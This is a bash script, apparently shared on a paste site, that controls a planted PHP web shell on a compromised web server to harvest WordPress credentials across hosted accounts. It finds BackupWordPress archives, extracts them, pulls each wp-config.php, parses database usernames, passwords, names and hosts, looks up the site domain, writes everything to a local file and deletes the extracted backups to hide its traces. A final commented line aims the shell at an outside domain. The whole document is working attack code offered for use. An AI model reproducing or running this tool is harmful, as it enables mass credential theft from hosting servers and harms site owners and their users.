TAIIIII 2

1. #!/bin/bash
2.  
3. SHELL="http://localhost/zeroshell.php";
4. HOST=$(curl -s -d 'cmd=hostname' ${SHELL}"?ext=shellcmd" | sed "s|readonly>|\nHost: |g" | sed 's|</textarea>|\n|g' | grep 'Host:' | awk '{print $2}');
5. echo '[GRABFROM] '$HOST;
6. FILENAME='wpconfig_'${HOST}'.txt';
7.  
8. function wpdomain() {
9. user=$(echo ${1} | sed 's/@/%40/g' | sed 's/&/%26/g');
10. pass=$(echo ${2} | sed 's/@/%40/g' | sed 's/&/%26/g');
11. db=$(echo ${3} | sed 's/@/%40/g' | sed 's/&/%26/g');
12. host=$(echo ${4} | sed 's/@/%40/g' | sed 's/&/%26/g');
13. DOMAIN=$(curl -s -d "wpuser="${user} -d "wppass="${pass} -d 'wpdb='${db} -d 'wphost='${host} -X POST ${SHELL}"?grab=wp_options" | grep 'DOMAIN' | sed 's|\[DOMAIN\]|WP_Site:|g');
14. echo $DOMAIN;
15. echo $DOMAIN >> $FILENAME;
16. }
17.  
18. function miningblue() {
19. CHK=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g' | wc -l);
20. if [[ "$CHK" == "1" ]];then
21. ASH=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
22. GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
23. echo -ne '-- Loading |:::';
24. DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
25. echo -ne ':::';
26. DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
27. echo -ne ':::';
28. CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
29. echo -ne ':::';
30. curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
31. echo -ne ':::| 100%\n';
32. WPUSER=$(cat wp_config.php.temp | grep 'DB_USER' | sed "s|define('DB_USER', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_USER ||g');
33. WPPASS=$(cat wp_config.php.temp | grep 'DB_PASSWORD' | sed "s|define('DB_PASSWORD', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_PASSWORD ||g');
34. DBNAME=$(cat wp_config.php.temp | grep 'DB_NAME' | sed "s|define('DB_NAME', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_NAME ||g');
35. WPHOST=$(cat wp_config.php.temp | grep 'DB_HOST' | sed "s|define('DB_HOST', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_HOST ||g');
36. if [[ -z $WPUSER ]];then
37. echo '-- FAILED GRAB CONFIG.';
38. echo '';
39. elif [[ $WPUSER =~ 'DB_USER' ]]; then
40. echo '-- CONFIG ANJING!';
41. echo 'WP_User: '$WPUSER;
42. echo 'WP_Pass: '$WPPASS;
43. echo 'DB_Name: '$DBNAME;
44. echo 'WP_Host: '$WPHOST;
45. echo '';
46. echo 'WP_User: '$WPUSER >> $FILENAME;
47. echo 'WP_Pass: '$WPPASS >> $FILENAME;
48. echo 'DB_Name: '$DBNAME >> $FILENAME;
49. echo 'WP_Host: '$WPHOST >> $FILENAME;
50. echo '' >> $FILENAME;
51. else
52. echo 'WP_User: '$WPUSER;
53. echo 'WP_Pass: '$WPPASS;
54. echo 'DB_Name: '$DBNAME;
55. echo 'WP_Host: '$WPHOST;
56. wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST}
57. echo '';
58. echo 'WP_User: '$WPUSER >> $FILENAME;
59. echo 'WP_Pass: '$WPPASS >> $FILENAME;
60. echo 'DB_Name: '$DBNAME >> $FILENAME;
61. echo 'WP_Host: '$WPHOST >> $FILENAME;
62. echo '' >> $FILENAME;
63. fi
64. ## DELBUP ##
65. curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
66.  
67. else
68. GRAB=$(curl -s ${SHELL}"?path="${1} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
69. count=0;
70. for ASH in $(echo $GRAB)
71. do
72. count=$[count+1];
73. echo '-- ['$count']';
74. GETGZ=$(curl -s ${SHELL}"?path="${ASH} | grep 'EXTRACT TO TMP' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
75. echo -ne '-- Loading |:::';
76. DIRBUP=$(curl -s -d "extract=1" "${SHELL}${GETGZ}" | grep 'EXTRACTED' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
77. echo -ne ':::';
78. DIRUSER=$(curl -s ${SHELL}"?path="${DIRBUP} | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
79. echo -ne ':::';
80. CONFDIR=$(curl -s ${SHELL}${DIRUSER} | grep 'wp-config.php' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | head -1);
81. echo -ne ':::';
82. curl -s ${SHELL}${CONFDIR} > wp_config.php.temp;
83. echo -ne ':::| 100%\n';
84. WPUSER=$(cat wp_config.php.temp | grep 'DB_USER' | sed "s|define('DB_USER', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_USER ||g');
85. WPPASS=$(cat wp_config.php.temp | grep 'DB_PASSWORD' | sed "s|define('DB_PASSWORD', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_PASSWORD ||g');
86. DBNAME=$(cat wp_config.php.temp | grep 'DB_NAME' | sed "s|define('DB_NAME', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_NAME ||g');
87. WPHOST=$(cat wp_config.php.temp | grep 'DB_HOST' | sed "s|define('DB_HOST', ||g" | grep -o '['"'"'"][^"'"'"']*['"'"'"]' | sed "s|^'||g" | sed "s|'$||g" | sed 's|DB_HOST ||g');
88. if [[ -z $WPUSER ]];then
89. echo '-- FAILED GRAB CONFIG.';
90. echo '';
91. elif [[ $WPUSER =~ 'DB_USER' ]]; then
92. echo '-- CONFIG ANJING!';
93. echo 'WP_User: '$WPUSER;
94. echo 'WP_Pass: '$WPPASS;
95. echo 'DB_Name: '$DBNAME;
96. echo 'WP_Host: '$WPHOST;
97. echo '';
98. echo 'WP_User: '$WPUSER >> $FILENAME;
99. echo 'WP_Pass: '$WPPASS >> $FILENAME;
100. echo 'DB_Name: '$DBNAME >> $FILENAME;
101. echo 'WP_Host: '$WPHOST >> $FILENAME;
102. echo '' >> $FILENAME;
103. else
104. echo 'WP_User: '$WPUSER;
105. echo 'WP_Pass: '$WPPASS;
106. echo 'DB_Name: '$DBNAME;
107. echo 'WP_Host: '$WPHOST;
108. wpdomain ${WPUSER} ${WPPASS} ${DBNAME} ${WPHOST}
109. echo '';
110. echo 'WP_User: '$WPUSER >> $FILENAME;
111. echo 'WP_Pass: '$WPPASS >> $FILENAME;
112. echo 'DB_Name: '$DBNAME >> $FILENAME;
113. echo 'WP_Host: '$WPHOST >> $FILENAME;
114. echo '' >> $FILENAME;
115. fi
116.  
117. ## DELBUP ##
118. curl -s ${SHELL}"?action=rmdir&file="$DIRBUP -o /dev/null;
119. done
120. fi
121.  
122. }
123.  
124. USRJUMP=$(curl -s ${SHELL}"?ext=backupwordpress" | grep -o '] <a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^] <a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g');
125.  
126. if [ -z "$USRJUMP" ];then
127. echo "[BAD] FAILED GRAB!";
128. else
129. i=0;
130. for USR in $(echo $USRJUMP)
131. do
132. i=$[i+1];
133. echo '['$i'] '$USR;
134. miningblue $USR
135. echo '';
136. done
137. fi
138.  
139.  
140. # curl -s "http://icgd2d.com/FOURMASTER/zeroshell.php" | grep -e '\[D\]' | grep -o '<a href=['"'"'"][^"'"'"']*['"'"'"]' | sed -e 's/^<a href=["'"'"']//' -e 's/["'"'"']$//' | sed 's|?path=||g'